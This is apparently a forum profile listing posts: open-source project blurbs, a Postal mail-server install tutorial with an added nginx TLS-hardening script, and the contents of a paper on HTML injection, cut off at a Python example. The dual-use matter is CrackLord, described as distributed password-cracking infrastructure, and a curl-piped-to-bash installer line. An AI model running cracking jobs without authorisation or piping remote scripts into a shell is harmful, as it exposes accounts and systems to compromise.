Everything posted by Fi8sVrs

  1. <♫/> Rythm.js - v2.1.1 - A javascript library that makes your page dance.

     Demo at: https://okazari.github.io/Rythm.js/

     Getting started

     Install with npm:

         npm install rythm.js

     CDN:

         https://unpkg.com/rythm.js/
         https://cdnjs.cloudflare.com/ajax/libs/rythm.js/2.x.x/rythm.min.js

     Good old way

     Import rythm into your page:

         <script type="text/javascript" src="/path/to/rythm.min.js"></script>

     Add one of the rythm css classes to indicate which element will dance.

         <div class="rythm-bass"></div>

     Create a Rythm object and give it your audio url, then use the start function.

         var rythm = new Rythm();
         rythm.setMusic("path/to/sample.mp3");
         rythm.start();

     ES6 module

         import Rythm from 'rythm.js'

         const rythm = new Rythm();
         rythm.setMusic("path/to/sample.mp3");
         rythm.start();

     API Documentation

     Rythm object

         var rythm = new Rythm();

         /* The starting scale is the minimum scale your elements will take (Scale ratio is startingScale + (pulseRatio * currentPulse));
          * Value in percentage between 0-1
          * Default 0.75 */
         rythm.startingScale = value;

         /* The pulse ratio is the maximum additional scale your element will take (Scale ratio is startingScale + (pulseRatio * currentPulse))
          * Value in percentage between 0-1
          * Default 0.30 */
         rythm.pulseRatio = value;

         /* The max value history represents the number of past values that will be stored to evaluate the current pulse.
          * Int value, minimum 1
          * Default 100 */
         rythm.maxValueHistory = value;

         /* Set the music the page will dance to.
          * @audioUrl : '../example/mysong.mp3' */
         rythm.setMusic(audioUrl);

         /* Used to collaborate with other players library
          * You can connect Rythm to an audioElement, and then control the audio with your other player */
         rythm.connectExternalAudioElement(audioElement)

         /* Adjust music's gain.
          * @value : Number */
         rythm.setGain(value);

         /* Add your own rythm-class
          * @elementClass: Class that you want to link your rythm to.
          * @danceType : Use any of the built-in effects or give your own function;
          * @startValue: The starting frequency of your rythm.
          * @nbValue: The number of frequencies of your rythm.
          * 1024 Frequencies, your rythm will react to the average of your selected frequencies.
          * Examples : bass 0-10 ; medium 150-40 ; high 500-100 */
         rythm.addRythm(elementClass, danceType, startValue, nbValue);

         /* Plug your computer microphone to rythm.js
          * This function returns a promise resolved when the microphone is up.
          * Requires your website to be run in HTTPS */
         rythm.plugMicrophone().then(function(){...})

         //Let's dance
         rythm.start();

         //Stop the party
         rythm.stop();

     Built-in classes with "pulse" effect

       • rythm-bass
       • rythm-medium
       • rythm-high

     Custom classes

     You can use the addRythm function to make your own classes listen to specific frequencies. Here is how the basic classes are created:

         addRythm('rythm-bass','pulse',0,10);
         addRythm('rythm-medium','pulse',150,40);
         addRythm('rythm-high','pulse',500,100);

     Available dance types

     For more control of these dance types, you can give a configuration object as last argument to addRythm:

         addRythm('rythm-high', 'shake', 500, 100, { direction:'left', min: 20, max: 300});

     Here are the built-in dances and their options:

       • pulse
           min : Minimum value given to transform: scale(). Default: 0.75
           max : Maximum value given to transform: scale(). Default: 1.25
       • jump
           min : Minimum value given to transform: translateY(). Default: 0
           max : Maximum value given to transform: translateY(). Default: 30
       • shake
           min : Minimum value given to transform: translateX(). Default: -15
           max : Maximum value given to transform: translateX(). Default: 15
           direction : left for a right to left move, right for a left to right move. Default: right
       • twist
           min : Minimum value given to transform: rotate(). Default: -20
           max : Maximum value given to transform: rotate(). Default: 20
           direction : left for a right to left move, right for a left to right move. Default: right
       • vanish
           min : Minimum value (between 0 and 1) given to opacity. Default: 0
           max : Maximum value (between 0 and 1) given to opacity. Default: 1
           reverse : Boolean to reverse the effect. Default false (The higher the pulse is, the more visible it will be)
       • color
           from : Array of integers between 0 and 255 corresponding to an RGB color. Default: [0,0,0]
           to : Array of integers between 0 and 255 corresponding to an RGB color. Default: [255,255,255]

     To see each visual effect, you can go to the Demo.

     Custom dance type

     If you want to use your own dance type, you can give a function as the 2nd argument of addRythm:

         /* The custom function signature is :
          * @elem: The HTML element target you want to apply your effect to
          * @value: The current pulse ratio (percentage between 0 and 1)
          * @options: The option object user can give as last argument of addRythm function */
         const pulse = (elem, value, options = {}) => {
           const max = options.max || 1.25
           const min = options.min || 0.75
           const scale = (max - min) * value
           elem.style.transform = `scale(${min + scale})`
         }

         addRythm('my-css-class', pulse, 150, 40)

     Features

       • Your HTML can dance by using any of the available dance types
       • You can use custom functions to build your own dance type (and if it looks awesome! Feel free to make a PR)

     Contribute

     Any pull request will be appreciated. You can start coding on this project following these steps:

       • Fork the project
       • Clone your repository
       • run npm install
       • run npm start in the main folder to launch a development webserver.
       • Enjoy the rythm.

     Adding new dance type

     In v2.0.x adding a new dance type is pretty easy.

     Create a new file in src\dances. This file must export your custom dance type function. For example, here is the content of the jump.js file:

         /* The function signature is :
          * @elem: The HTML element target you want to apply your effect to
          * @value: The current pulse ratio (percentage between 0 and 1)
          * @options: The option object user can give as last argument of addRythm function */
         export default (elem, value, options = {}) => {
           const max = options.max || 30
           const min = options.min || 0
           const jump = (max - min) * value
           elem.style.transform = `translateY(${-jump}px)`
         }

     Import it and register it into the constructor of the Dancer.js file:

         import jump from './dances/jump.js'

         class Dancer {
           constructor() {
             this.registerDance('jump', jump)
           }
         }

     Commit it and create a PR. Then look at everyone enjoying your contribution!

     Licence: GNU GPL
     Author: @OkazariBzh

     Download: Rythm.js-master.zip or git clone https://github.com/Okazari/Rythm.js.git
     Source: https://github.com/Okazari/Rythm.js
  2. LeProxy

     LeProxy is the HTTP/SOCKS proxy server for everybody!

     LeProxy is designed for anonymous surfing, improved security and privacy plus circumventing geoblocking. It allows you to enjoy the web like it's meant to work and access your favorite online video platform without annoying country blocks while traveling.

     LeProxy is a powerful, lightweight, fast and simple to use proxy server that you can host on your own server or PC at home and then access from anywhere. It supports optional authentication so you can share a server instance with your family and friends without having to worry about third parties. It provides compatibility with a large number of clients and services by accepting both common HTTP and SOCKS proxy protocols on a single listening port.

     Table of contents:

       • Install
       • Usage
       • Clients
       • Development
       • License

     Note that this is an early beta version and that LeProxy is under active development. Many new features are going to be added in the future!

     Download: leproxy-master.zip or git clone https://github.com/leproxy/leproxy.git
     Source: https://github.com/leproxy/leproxy
  3. About BotMan

     BotMan is a framework agnostic PHP library that is designed to simplify the task of developing innovative bots for multiple messaging platforms, including Slack, Telegram, Microsoft Bot Framework, Nexmo, HipChat, Facebook Messenger and WeChat.

         $botman->hears('I want cross-platform bots with PHP!', function (BotMan $bot) {
             $bot->reply('Look no further!');
         });

     Documentation

     You can find the BotMan documentation at http://botman.io

     Support the development

     Do you like this project? Support it by donating:

       • PayPal: Donate
       • Patreon: Donate

     Contributing

     Please see CONTRIBUTING for details.

     Security Vulnerabilities

     If you discover a security vulnerability within BotMan, please send an e-mail to Marcel Pociot at m.pociot@gmail.com. All security vulnerabilities will be promptly addressed.

     License

     BotMan is free software distributed under the terms of the MIT license.

     Download: botman-master.zip
     Sources: https://botman.io https://github.com/botman/botman
  4. What Is It?

     CrackLord is a system designed to provide a scalable, pluggable, and distributed system for both password cracking as well as any other jobs needing lots of computing resources. Better said, CrackLord is a way to load balance the resources, such as CPU, GPU, Network, etc. from multiple hardware systems into a single queueing service across two primary services: the Resource and Queue. It won't make these tasks faster, but it will make it easier to manage them.

     System Components

     There are three primary components to CrackLord as shown in the above image:

       • Queue - The Queue is a service that runs on a single system, providing an interface for users to submit, pause, resume, and delete jobs. These jobs are then processed and sent to available Resources to perform the actual work and handle the results.
       • Resource / Resource Managers - Resources are the individual servers that are connected into the queue. They are managed by resource manager plugins. These are code that allow various types of resources to be connected. Managers can directly connect to physical resources you own, or use cloud services to spawn resources as necessary.
       • Tools - Tools are a set of plugins, configured on resources, that perform the underlying tasks such as running oclHashcat to crack passwords. Tools are written in the Go programming language and have a standard interface to make them easy to write or enhance. They are wrappers of the various tools used that require great deals of resources, such as John, HashCat, etc.

     Server Installation

     We have a set of packages built for every release we make; if you'd like to just use that you can do it by simply following the instructions here. If you'd like to get things built from source, it will first require you to have a working Go build environment with the GOPATH set up. Additionally, you'll probably want Git and Mercurial set up to gather the various libraries and plugins that we've used in the code.

     First, you'll need to get cracklord itself.

         go get github.com/jmmcatee/cracklord

     Next we need to get all of the dependencies downloaded for both the resource daemon and queue daemon.

         go get github.com/jmmcatee/cracklord/cmd/queued
         go get github.com/jmmcatee/cracklord/cmd/resourced

     Now we can actually build the queue daemon and resource daemon.

         go build github.com/jmmcatee/cracklord/cmd/queued
         go build github.com/jmmcatee/cracklord/cmd/resourced

     Finally, we can run both the resource and queue daemons, which will both be in the cmd/queued and cmd/resourced directories. You will also need to set up the various configuration files; information for those can be found in our wiki.

     Contributing

     Addons

     Probably the easiest way to get involved is to write a new tool plugin. If you have tools that you use as part of testing, research, or work and would like to get them integrated, you can very easily write a new tool and send us a pull request. We'll make sure to get it integrated in as soon as possible. In the plugins directory we have created an empty tool to provide some guidance and help.

     If you also have a neat way to interact with resources, you could also write a resource manager plugin, maybe for a cloud service that we don't support yet or some new way to do the work. Because of the way the Go language works, we have to compile all of the tools in, so if you do something you'd like to share please send us a pull request and we'll test it and get it out for everyone to use.

     Scripts / GUI

     We have a standard API that the queue daemon publishes out for access. We went ahead and wrote a standard web GUI which also uses the same API. That doesn't mean you couldn't make a better one! We're also looking at writing a few scripts to automate common jobs in our workflow; if you end up making them send us links or a pull request and we'll make sure to find a home / give you a shout out!

     Documentation

     We're working hard to try and keep the documentation up to date with everything we're doing, but there's always room for a how-to, tutorial, or example and we'd love any help you can provide on those. Head on over to our wiki and see what needs fixing or adding!

     Bugs / Issues

     Of course, there's nothing saying you can't work on the CrackLord queue and resource daemons themselves. We have our issues list and any help getting those fixed would be greatly appreciated.

     Download: cracklord-master.zip
     Source: http://jmmcatee.github.io/cracklord/
  5. To cover, veil, wrap

     A free, decentralized, anonymity technology based on I2P's open specifications

     Disclaimer

     Currently pre-alpha software; under heavy development (and not yet integrated with monero)

     Downloads

     Releases

     Alpha release coming soon

     Nightly Releases (bleeding edge)

     Operating System | Processor | Download | Checksum
       • Ubuntu 16.04 | i686 | kovri-latest-linux-i686.tar.bz2 | kovri-latest-linux-i686.tar.bz2.sha256sum.txt
       • Ubuntu 16.04 | amd64 | kovri-latest-linux-amd64.tar.bz2 | kovri-latest-linux-amd64.tar.bz2.sha256sum.txt
       • Ubuntu 16.04 | armv7 | kovri-latest-linux-armv7.tar.bz2 | kovri-latest-linux-armv7.tar.bz2.sha256sum.txt
       • Debian Stable | armv8 | kovri-latest-linux-armv8.tar.bz2 | kovri-latest-linux-armv8.tar.bz2.sha256sum.txt
       • OSX 10.10/11/12 | amd64 | kovri-latest-osx-10.10.tar.bz2 | kovri-latest-osx-10.10.tar.bz2.sha256sum.txt
       • FreeBSD 11 | amd64 | kovri-latest-freebsd-amd64.tar.bz2 | kovri-latest-freebsd-amd64.tar.bz2.sha256sum.txt
       • OpenBSD 6 | amd64 | kovri-latest-openbsd-amd64.tar.bz2 | kovri-latest-openbsd-amd64.tar.bz2.sha256sum.txt
       • DragonFly BSD 4.6 | amd64 | kovri-latest-dragonfly-4.6.tar.bz2 | kovri-latest-dragonfly-4.6.tar.bz2.sha256sum.txt
       • Windows | i686 | kovri-latest-win32.exe | kovri-latest-win32.exe.sha256sum.txt
       • Windows | amd64 | kovri-latest-win64.exe | kovri-latest-win64.exe.sha256sum.txt

     Coverage: Coverity, Coveralls

     License

     Documentation

       • Build instructions, User Guide, and more can be found in your language within the kovri-docs repository
       • Moneropedia is recommended for all users and developers

     Developers

       • Various guides (contributing, style, etc.) can be found in your language within the kovri-docs repository (please review before submitting a pull request)
       • Forum Funding System to get funded for your work, submit a proposal
       • build.getmonero.org or monero-build.i2p for detailed build information
       • repo.getmonero.org or monero-repo.i2p are alternatives to GitHub for non-push repository access

     Vulnerability Response

       • We will pay hackers in Monero (XMR) to exploit Kovri responsibly!
       • See our VRP (Vulnerability Response Process) in kovri-docs for responsible disclosure

     Repositories

       • Kovri
       • Kovri Docs
       • Kovri Website
       • Monero/Kovri meta

     Support

       • IRC: Freenode | OFTC | Irc2P with Kovri
           #kovri | Community & Support Channel
           #kovri-dev | Development Channel
       • Reddit /r/Kovri
       • Monero StackExchange

     Contact

       • Email:
           General Purpose / Media Contact: dev [at] getmonero.org
           All other contact: anonimal [at] i2pmail.org
       • PGP Key fingerprint: 1218 6272 CD48 E253 9E2D D29B 66A7 6ECF 9144 09F1
       • @monerocurrency

     Download: kovri-master.zip
     Source: https://github.com/monero-project/kovri
  6. Postal is a free and open source complete mail server for sending and receiving emails. It is written in Ruby and JavaScript. You can easily install Postal on your own server. It also helps you in providing the correct DNS information required to reduce spam emails. Postal is used by many organizations to send and receive mails on a daily basis. In this tutorial, we will install Postal Mail Server on Ubuntu 17.04.

     Prerequisite

       • Minimal Ubuntu 17.04 server.
       • 8 GB RAM recommended.
       • Root privileges. This guide is written as the root user; if you are logged in as a sudo user, run sudo -i.
       • A domain name pointed towards your server.

     Update Base System

     Before installing any package it is recommended that you update the packages and repository using the following command.

         apt update && apt -y upgrade
         shutdown -r now

     Once your system is updated, proceed further to install Ruby.

     Install Ruby

     Postal is written in Ruby, hence it is required to install Ruby 2.3 or greater on your system. In this tutorial, we will install the latest version of Ruby using RVM. Run the following command to add the GPG key of RVM on your server.

         gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3

     Now install RVM using the following command.

         curl -sSL https://get.rvm.io | bash -s stable

     To use RVM immediately, you will need to run the following command.

         source /etc/profile.d/rvm.sh

     Now fetch the list of Rubies using the following command.

         rvm list known

     You will see the following output:

         # MRI Rubies
         [ruby-]1.8.6[-p420]
         [ruby-]1.8.7[-head] # security released on head
         [ruby-]1.9.1[-p431]
         [ruby-]1.9.2[-p330]
         [ruby-]1.9.3[-p551]
         [ruby-]2.0.0[-p648]
         [ruby-]2.1[.10]
         [ruby-]2.2[.6]
         [ruby-]2.3[.3]
         [ruby-]2.4[.0]
         ruby-head

     Now install the latest version of Ruby in the list using the following command.

         rvm install 2.4

     Use the Ruby version using the following command.

         rvm use 2.4

     You can verify the version of Ruby using the following command.

         ruby -v

     You should see the following output if Ruby is installed successfully.

         root@ubuntu:~# ruby -v
         ruby 2.4.0p0 (2016-12-24 revision 57164) [x86_64-linux]

     Install Ruby Gems

     To run Postal on your server, you will need to install bundler and procodile on your server. bundler is a dependency manager for Ruby gem applications. procodile is a process management tool for Ruby applications. Install both the applications using the following commands.

         gem install bundler
         gem install procodile

     Install MariaDB Database Server

     MariaDB is a fork of the MySQL database server. MySQL is a relational database management system software used to store data in tabular format. To install MariaDB on your server, run:

         apt -y install mariadb-client mariadb-server libmysqlclient-dev

     Run the following commands to start MariaDB and enable it to start at boot time.

         systemctl start mariadb
         systemctl enable mariadb

     Now run the following command to secure your MariaDB installation.

         mysql_secure_installation

     The above command will run a script to secure a fresh MariaDB installation. The script will ask for the existing root user password; we have just installed MariaDB, so the root password is not set, just press enter to proceed further. The script will ask you if you want to set a root password for your MariaDB installation; choose y and set a strong password for the installation. Most of the questions are self-explanatory and you should answer yes or y to all the questions.

     Setup Database for Postal

     To create a database for Postal, we will need to login to the MySQL command line first. Run the following command for the same.

         mysql -u root -p

     The above command will log in to the MySQL shell of the root user; it will prompt for the password of the root user. Provide the password to log in. Now run the following query to create a new database for your Postal installation.

         CREATE DATABASE postal CHARSET utf8mb4 COLLATE utf8mb4_unicode_ci;

     The above query will create a new database named postal. Make sure that you use a semicolon at the end of each query as the query always ends with a semicolon. Now provide all the privileges to your database user over the database you have created. Run the following command.

         GRANT ALL ON `postal`.* TO `postal`@`127.0.0.1` IDENTIFIED BY "StrongPassword";

     Replace StrongPassword with a very strong and secure password. The database will be automatically written by Postal, but for that, we will need to provide appropriate permissions to Postal users. Run the following command to provide privilege to all the users which start with postal-.

         GRANT ALL PRIVILEGES ON `postal-%` . * to `postal`@`127.0.0.1` IDENTIFIED BY "StrongPassword";

     Now run the following command to immediately apply the changes on the database privileges.

         FLUSH PRIVILEGES;

     Exit from the MySQL prompt using the following command.

         EXIT;

     Install RabbitMQ

     RabbitMQ is written in the Erlang language; in this tutorial we will install the latest version of Erlang on the server. Install Erlang using the following command.

         apt -y install erlang

     Import the GPG key by running:

         curl -sL https://www.rabbitmq.com/rabbitmq-release-signing-key.asc | sudo apt-key add -

     Now add the RabbitMQ repository by running the following command:

         add-apt-repository 'deb http://www.rabbitmq.com/debian/ testing main'

     Update the repository index by running the following command.

         apt update

     Now you can install RabbitMQ by running the following command.

         apt -y install rabbitmq-server

     RabbitMQ is now installed on your system.

     Setup RabbitMQ

     You can start the RabbitMQ server process by running the following command.

         systemctl start rabbitmq-server

     To automatically start RabbitMQ at boot time, run the following command.

         systemctl enable rabbitmq-server

     Now run the following command to create a virtual host for Postal in the RabbitMQ server.

         rabbitmqctl add_vhost /postal

     Now add a RabbitMQ user for Postal by running the following command.

         rabbitmqctl add_user postal StrongPassword

     Replace StrongPassword with a very strong password. Now set appropriate permissions on the RabbitMQ virtual host for the RabbitMQ user.

         rabbitmqctl set_permissions -p /postal postal ".*" ".*" ".*"

     Install Git and Node.js

     Git will be used to retrieve the installer package and a few dependencies. Run the following command to install Git on your system.

         apt -y install git

     You can check if Git is installed successfully by checking the version using the following command.

         git --version

     You should get the following output.

         root@ubuntu:~# git --version
         git version 2.11.0

     Node.js will be used to compile the JavaScript library. Install the software using the following command.

         apt -y install nodejs

     You can check if Node.js is installed successfully by running the following command.

         nodejs -v

     You should get the following output.

         root@ubuntu:~# nodejs -v
         v4.7.2

     Now that we have all the dependencies ready, you can install Postal.

     Install Postal

     Postal should run as its own isolated user. Run the following command to create a new user.

         useradd -r -m -d /opt/postal -s /bin/bash postal

     The above command will create a new user with username postal and the home directory set to /opt/postal. Allow Ruby to listen on privileged ports by running the following command.

         setcap 'cap_net_bind_service=+ep' /usr/local/rvm/rubies/ruby-2.4.0/bin/ruby

     Now that everything is ready, download the latest Postal archive and extract the archive as the Postal user using the following command.

         wget https://postal.atech.media/packages/stable/latest.tgz -O - | sudo -u postal tar zxpv -C /opt/postal

     Now create a symbolic link to the Postal binary file by running the following command.

         ln -s /opt/postal/bin/postal /usr/bin/postal

     Now you can interact with your Postal server from any directory. For running the next commands you will need to login to a shell as the postal user.

         su - postal

     Now you will need to install all the Ruby dependencies required to run the application.
         postal bundle /opt/postal/vendor/bundle

     Once the dependencies have been installed, you will need to generate the default configuration files.

         postal initialize-config

     The above command will generate the required configuration for your Postal installation including various keys and certificates. This will also generate the default postal.yml configuration file. You should get the following output.

         postal@ubuntu:~$ postal initialize-config
         Created example config file at /opt/postal/config/postal.yml
         Created new private key for Let's Encrypt
         Created new signing key for DKIM & HTTP requests
         Created new private key for default fast server TLS connections
         Created new self signed certificate for default fast server TLS connections

     Now you will need to configure a few options in the postal.yml configuration.

         nano /opt/postal/config/postal.yml

     Find the following line:

         web:
           # The host that the management interface will be available on
           host: postal.example.com

     Change the hostname to your actual domain name. Further, find the following lines.

         main_db:
           # Specify the connection details for your MySQL database
           host: 127.0.0.1
           username: postal
           password: p0stalpassw0rd
           database: postal

         message_db:
           # Specify the connection details for your MySQL server that will be house the
           # message databases for mail servers.
           host: 127.0.0.1
           username: postal
           password: p0stalpassw0rd
           prefix: postal

     Change the username, password and database name according to the database you have created. Further, find these lines:

         rabbitmq:
           # Specify the connection details for your RabbitMQ server.
           host: 127.0.0.1
           username: postal
           password: StrongPassword
           vhost: /postal

     Change the above configuration according to the vhost and user created for RabbitMQ. Next, find the DNS configurations.

         dns:
           # Specifies the DNS record that you have configured. Refer to the documentation at
           # https://github.com/atech/postal/wiki/Domains-&-DNS-Configuration for further
           # information about these.
           mx_records:
             - mx.postal.example.com
           smtp_server_hostname: postal.example.com
           spf_include: spf.postal.example.com
           return_path: rp.postal.example.com
           route_domain: routes.postal.example.com
           track_domain: track.postal.example.com

     Change the domains above to the actual domains you wish to use with the mail server. Save the file and exit from the editor. Now, initialize the database and other assets by running:

         postal initialize

     Create the Postal administrator user by running the following command.

         postal make-user

     The above command will ask you for the email address, username and password. The above command will generate the following output.

         postal@ubuntu:~$ postal make-user
         Postal User Creator
         Enter the information required to create a new Postal user.
         This tool is usually only used to create your initial admin user.

         E-Mail Address      : me@liptanbiswas.com
         First Name          : Liptan
         Last Name           : Biswas
         Initial Password:   : **************

         User has been created with e-mail address me@liptanbiswas.com

     The command line setup of Postal is now finished; you can start the server using the following command.

         postal start

     To check if the services are started correctly, run the following command.

         postal status

     You should get the following output.

         postal@ubuntu:~$ postal status
         Procodile Version   1.0.17
         Application Root    /opt/postal
         Supervisor PID      5319
         Started             2017-07-21 07:26:19 +0000

         || web
         || Quantity            1
         || Command             bundle exec puma -C config/puma.rb
         || Respawning          5 every 3600 seconds
         || Restart mode        usr1
         || Log path            none specified
         || Address/Port        none
         || => web.1            Running   07:26   pid:5325   respawns:0   port:-   tag:-

         || worker
         || Quantity            1
         || Command             bundle exec ruby script/worker.rb
         || Respawning          5 every 3600 seconds
         || Restart mode        start-term
         || Log path            none specified
         || Address/Port        none
         || => worker.1         Running   07:26   pid:5327   respawns:0   port:-   tag:-

         || cron
         || Quantity            1
         || Command             bundle exec rake postal:cron
         || Respawning          5 every 3600 seconds
         || Restart mode        term-start
         || Log path            none specified
         || Address/Port        none
         || => cron.1           Running   07:26   pid:5329   respawns:0   port:-   tag:-

         || smtp
         || Quantity            1
         || Command             bundle exec rake postal:smtp_server
         || Respawning          5 every 3600 seconds
         || Restart mode        usr1
         || Log path            none specified
         || Address/Port        none
         || => smtp.1           Running   07:26   pid:5332   respawns:0   port:-   tag:-

         || requeuer
         || Quantity            1
         || Command             bundle exec rake postal:requeuer
         || Respawning          5 every 3600 seconds
         || Restart mode        term-start
         || Log path            none specified
         || Address/Port        none
         || => requeuer.1       Running   07:26   pid:5334   respawns:0   port:-   tag:-

     To stop Postal, you can always run the following command.

     Configuring Nginx and Reverse Proxy

     For security reasons, the Postal web interface and API should be behind a production web server such as Apache or Nginx. In this tutorial, we will install and configure Nginx as a reverse proxy. Install the Nginx web server by running the following command.

         apt -y install nginx

     It is recommended to use SSL to access Nginx. You can either use a self-signed certificate, a Let's Encrypt free SSL certificate or a commercial certificate. In this tutorial, we will use Let's Encrypt free SSL. Install the Let's Encrypt client, also known as certbot, by running the following command.
         apt -y install certbot

     Once the installation finishes, run the following command to obtain certificates from the Let's Encrypt certificate authority. Make sure that the domain name is pointed towards your server as certbot will check the domain authority before providing the certificates. Replace mail.example.com with your actual domain name.

         certbot certonly --standalone -d mail.example.com

     Once certificates are generated, they will be stored in /etc/letsencrypt/live/mail.example.com. Let's Encrypt SSL expires in 90 days, so it is recommended to set up an automatic renewal for your certificates. Run the following command to open your crontab file.

         crontab -e

     Enter the following line into the crontab file.

         30 1 * * 1 /usr/bin/certbot renew >> /var/log/le-renew.log

     The above cron job will automatically run every Monday at 1:30 AM and if your certificates are due for expiry, it will automatically renew them. Now create a new server block for your website by running the following command.

         nano /etc/nginx/conf.d/mail.example.com.conf

     Populate the file with the following content.

         server {
             listen [::]:80;
             listen 0.0.0.0:80;
             server_name mail.example.com;
             return 301 https://$host$request_uri;
         }

         server {
             listen [::]:443 ssl;
             listen 0.0.0.0:443 ssl;
             root /opt/postal/public;
             server_name mail.example.com;
             ssl_certificate /etc/letsencrypt/live/mail.example.com/fullchain.pem;
             ssl_certificate_key /etc/letsencrypt/live/mail.example.com/privkey.pem;
             ssl_protocols TLSv1.2 TLSv1.1 TLSv1;
             ssl_prefer_server_ciphers on;
             ssl_ciphers EECDH+ECDSA+AESGCM:EECDH+aRSA+AESGCM:EECDH+ECDSA+SHA512:EECDH+ECDSA+SHA384:EECDH+ECDSA+SHA256:ECDH+AESGCM:ECDH+AES256:DH+AESGCM:DH+AES256:RSA+AESGCM:!aNULL:!eNULL:!LOW:!RC4:!3DES:!MD5:!EXP:!PSK:!SRP:!DSS;
             location / {
                 client_max_body_size 50M;
                 try_files $uri $uri/index.html $uri.html @puma;
             }
             location /assets {
                 add_header Cache-Control max-age=3600;
             }
             location @puma {
                 proxy_set_header X-Real-IP $remote_addr;
                 proxy_set_header Host $host;
                 proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
                 proxy_set_header X-Forwarded-Proto https;
                 proxy_pass http://127.0.0.1:5000;
             }
         }

     Save the file and exit from the editor. Now restart the nginx web server by running:

         systemctl restart nginx

     To enable nginx to automatically start at boot time, run the following command.

         systemctl enable nginx

     You can now access Postal by browsing to the following web site through your favorite web browser.

         https://mail.example.com

     Configuring Postal

     Once you browse to the above site, you will see the following interface. Enter the email address and password of the user which you have created earlier. Once you are logged in, you will be asked to create a new organization. Provide the name of the organization. You can choose to use the auto generated short name, or you could specify one yourself. The short names are used as the username while authenticating with the SMTP server. It should only contain letters, numbers, and hyphens. Once the organization is created, you will be asked to create a new mail server. Provide the name, short name, and mode of the email server. In Live mode, all emails are routed and delivered normally, but in development mode they are only visible in the web interface.

     Once you have added the mail server, you will need to add a new domain in the mail server. Click on the Domains tab and create a new domain name. Once you have added the domain name, you will need to configure the DNS for the domain. You will need to add two TXT records for SPF and DKIM. You will also need to add a CNAME record and an MX record for return path and mail delivery. Once you configure the DNS, click the Check my records are correct button to verify the DNS configuration.

     Now you will need to create SMTP credentials for sending and receiving emails. Choose the type as SMTP or API. Provide the name for the SMTP credentials and choose how you wish to handle the email address. Once done, you can come back to the Overview tab and you will see the information needed to send or receive emails.

     Conclusion

     In this tutorial, we have successfully set up a full featured mail server using Postal on Ubuntu 17.04. You can use the mail server to send and receive the emails of your organization.

     Source
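     The server block in the tutorial above enables TLSv1 and TLSv1.1 next to TLSv1.2. As an added example that is not part of the original post, the POSIX shell functions below extract the ssl_protocols directive from an nginx config, flag legacy protocol versions, and rewrite the directive to TLSv1.2 and TLSv1.3 only; the function names and the sample config text are the example's own (the sample is a constructed excerpt of the tutorial's server block), and TLSv1.3 assumes an nginx build against OpenSSL 1.1.1 or later.

```shell
#!/bin/sh
# Added example, not part of the tutorial: audit and harden the ssl_protocols
# directive of an nginx server block. Function names and the sample config
# are hypothetical; the directive values are the ones the tutorial uses.

# Constructed excerpt of the tutorial's HTTPS server block.
TUTORIAL_CONF='server {
    listen 0.0.0.0:443 ssl;
    server_name mail.example.com;
    ssl_protocols TLSv1.2 TLSv1.1 TLSv1;
    ssl_prefer_server_ciphers on;
    proxy_pass http://127.0.0.1:5000;
}'

# Read an nginx config on stdin and print every protocol token listed in
# ssl_protocols directives, one per line.
ssl_protocols_in() {
    sed -n 's/^[[:space:]]*ssl_protocols[[:space:]]*\(.*\);.*/\1/p' \
        | tr ' ' '\n' | sed '/^$/d'
}

# audit_ssl_protocols CONFIG_TEXT
# Returns 0 when no legacy protocol (SSLv2, SSLv3, TLSv1, TLSv1.1) is enabled,
# 1 otherwise, naming the offending versions on stderr.
audit_ssl_protocols() {
    weak=$(printf '%s\n' "$1" | ssl_protocols_in \
        | grep -E '^(SSLv2|SSLv3|TLSv1|TLSv1\.1)$' || true)
    if [ -n "$weak" ]; then
        # $weak is intentionally unquoted: one token per line becomes one argument each
        printf 'legacy TLS protocol enabled: %s\n' $weak >&2
        return 1
    fi
    return 0
}

# harden_ssl_protocols CONFIG_TEXT
# Prints the config with each ssl_protocols directive rewritten to
# "TLSv1.2 TLSv1.3", keeping the original indentation.
harden_ssl_protocols() {
    printf '%s\n' "$1" \
        | sed 's/^\([[:space:]]*\)ssl_protocols[[:space:]].*;/\1ssl_protocols TLSv1.2 TLSv1.3;/'
}

# Demonstration on the constructed excerpt: report, then show the rewritten block.
if audit_ssl_protocols "$TUTORIAL_CONF"; then
    echo "ssl_protocols: ok"
else
    echo "rewritten server block:"
    harden_ssl_protocols "$TUTORIAL_CONF"
fi
```

     Point the functions at a real file with `audit_ssl_protocols "$(cat /etc/nginx/conf.d/mail.example.com.conf)"`; the hardened text is printed, not written back, so it can be reviewed before replacing the file.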
7. Demonstration by Shritam Bhowmick
Web Application Penetration Tester
Independent Consulting Security Evangelist
Dated: 22nd August, 2014, Springs, 9:22 PM IST

Web Application Exploitation with Shritam Bhowmick

Contents:
- Hack, p. 3
- HTML Injection as Code Injection, p. 5
- Deploying a sample Vulnerable ASP code for HTML Injection, p. 6
- Injecting HTML Code into ASP based Application – HTML Injection, p. 18
- Mitigating HTML Injection Vulnerable ASP code, p. 22
- Mitigating Vulnerable ASP Code via Input Sanitization, p. 23
- Mitigating Vulnerable ASP Code via Output Encoding, p. 27
- Input Sanitization and Output Encoding Combined, p. 30
- Deploying a sample Vulnerable PHP code for HTML Injection, p. 31
- Injecting HTML code into PHP based Application – HTML Injection, p. 34
- Mitigating HTML Injection Vulnerable PHP Code, p. 36
- Mitigating Vulnerable PHP Code via Input Sanitization, p. 37
- Mitigating Vulnerable PHP Code via Output Sanitization, p. 39
- Input Sanitization and Output Sanitization Combined, p. 41
- Deploying a Sample Vulnerable Python Code for HTML Injection, p. 42
- Injecting HTML Code into Python based Application – HTML Injection, p. 48
- Mitigating HTML Injection Vulnerable Python Code, p. 51
- Mitigating Vulnerable Python Code via Escaping, p. 57
- Mitigating Python Vulnerable Code via Websafe on Web Library, p. 62
- HTML Injection Scenario 1 – HTMLi on Attribute Context in Tags, p. 66
- HTML Injection Scenario 2 – HTMLi on Output Data Length Restriction, p. 71
- Contact Information, p. 81

Download: https://dl.packetstormsecurity.net/papers/general/codehtml-injection.pdf
Source: https://packetstormsecurity.com/files/143995/Code-Injection-HTML-Injection.html
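The paper's Python chapters and its two scenarios (attribute context, output length restriction) come down to one point: input concatenated into markup becomes markup, and neither truncation nor a text-only escape covers the attribute case. The following is an added example and not code from the paper: a deliberately vulnerable renderer, a truncating one, and the output-encoded form, audited with the standard library's HTML parser so the difference shows up as extra tags rather than as a visual check. The page template and the payload are constructed.

```python
"""HTML injection in text and attribute context: the vulnerable rendering
the paper deploys, beside its output-encoded form. Added example, not code
from the paper; the template and inputs are constructed."""
import html
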